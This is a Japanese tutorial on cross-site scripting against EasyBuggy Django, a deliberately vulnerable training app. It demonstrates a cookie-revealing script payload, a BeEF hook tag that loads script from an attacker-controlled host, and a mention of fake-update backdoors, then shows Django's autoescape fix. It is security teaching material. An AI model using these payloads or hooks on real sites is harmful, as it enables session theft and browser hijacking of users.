EasyBuggy djangoでXSS (by BeEF)

8395 ワード
Security 脆弱性 Django BeEF Django テキストリンク

この記事を読むと何がわかる?

・XSS(クロスサイトスプリクティング)の概要
・XSSツールであるBeEFの使い方
・XSSに対して脆弱性のあるdjangoのコードと対策法(まだ)

はじめに

EasyBuggy djangoを使って,XSS(クロスサイトスプリクティング)という手法でつついてみましょう.XSSにはBeEFという便利なツールもあるのでそれも使います.
環境構築はこちらの記事です.

XSSとは

javascriptを悪用していろいろするものらしいです.詳しい説明はわからないので置いといて,実際の動作を見ていきましょう.

EasyBuggy djangoでのXSS

EasyBuggyでのXSSのページは次のような画面です.

入力欄が用意してあって,文字列を入力すると逆並びにして表示してくれるサービスです.

表示されているように">tpircs/<;)eikooc.tnemucod(trela>tpIrcs<"と入力してみます.

なにか出て来ちゃいけないものが出てきてしまった感じがします.何が起こったのでしょうか.

本来なら逆並びの文字列が表示されるべきところのHTMLを確認してみると,つぎのような記述が見つかります.

<scrIpt>alert(document.cookie);</script>

これは>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<の逆さ並びなので,こうなることは理解できます.そして,このコードがjavascriptです.今回のコードでは,cookieの情報をポップアップで表示するという動作をします.

つまり,javascriptと解釈できるような文字列を入力することにより,想定していないような動作を起こすことがXSSです.

Let's exploit!

上の例だと自分のcookieを表示しただけで何がおかしいのかと思うかもしれません.しかし,重要なことは,javascriptをブラウザ上で操作できるということです.つまり,javascriptでできることならできるということです.いろいろできそう.

javascriptのコードを書くことにより様々なことができるはずですが,僕はjavascript書けないので,楽をするためにBeEFをつかいます.

BeEF

BeEFはkaliに標準で入っています.アイコンクリックで起動すると,ブラウザでログイン画面が開きます.id,passともにbeefです.ログイン後は次のような画面になります.

BeEFを使うためには,標的のPCをhookする必要があります.標的に次のコードを実行させればhookできます.

<script src="http://<IP>:3000/hook.js"></script>

には(BeEFを起動している)攻撃側のIPアドレスを入力してください.

実行例

ubuntu側でhookされるためのコードを実行し,BeEFからubuntu側のブラウザにメッセージを表示したいと思います.

うまくいきました!他にもブラウザのアップデートを装ってバックドアを実行させる方法などもあり,いろいろできます.

XSSの対策

XSSの対策として,特別な意味を持つ文字をそのまま処理せずに,置き換えて処理する方法(エスケープ)があります.特別な文字としては,<>&'"などが挙げられます.
phpの例ですが,こちらの記事が参考になります.

EasyBuggyソースの確認

EasyBuggyでの該当コードを確認してみましょう.

xss.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post" enctype="application/x-www-form-urlencoded">
    {% csrf_token %}
    <p>{% trans 'description.reverse.string' %}</p><br/>
    <label>{% trans 'label.string' %}</label><span>: </span>
    <input type="text" name="string" size="100" maxlength="100"/><br/>
    <br/> <input type="submit" value="{% trans 'label.submit' %}"/><br/><br/>
    {% autoescape off %}
    <p>{{ msg }}</p><br/>
    {% endautoescape %}
    <div class="alert alert-info" role="alert">
        <span class="glyphicon glyphicon-info-sign"></span>
        {% trans 'msg.note.xss' %}
    </div>
</form>
{% endblock %}

重要な部分は,

{% autoescape off %}
<p>{{ msg }}</p><br/>
{% endautoescape %}

の部分です.実はdjangoはデフォルトでは自動的にエスケープするようになっています.上ではこの機能をoffにしています.次のように書き換えてみます.

xss.html
{% extends "base.html" %}
{% load i18n %}
{% block body %}
{% include "header.html" %}
<form action="" method="post" enctype="application/x-www-form-urlencoded">
    {% csrf_token %}
    <p>{% trans 'description.reverse.string' %}</p><br/>
    <label>{% trans 'label.string' %}</label><span>: </span>
    <input type="text" name="string" size="100" maxlength="100"/><br/>
    <br/> <input type="submit" value="{% trans 'label.submit' %}"/><br/><br/>
    escaped
    <p>{{ msg }}</p><br/>
    not escaped
    {% autoescape off %}
    <p>{{ msg }}</p><br/>
    {% endautoescape %}
    <div class="alert alert-info" role="alert">
        <span class="glyphicon glyphicon-info-sign"></span>
        {% trans 'msg.note.xss' %}
    </div>
</form>
{% endblock %}

ブラウザで確認してみましょう.

自動エスケープを無効化してない方はエスケープがうまく行っていることがわかります.

まとめ

XSSの悪用方法とdjangoでの対策をまとめました.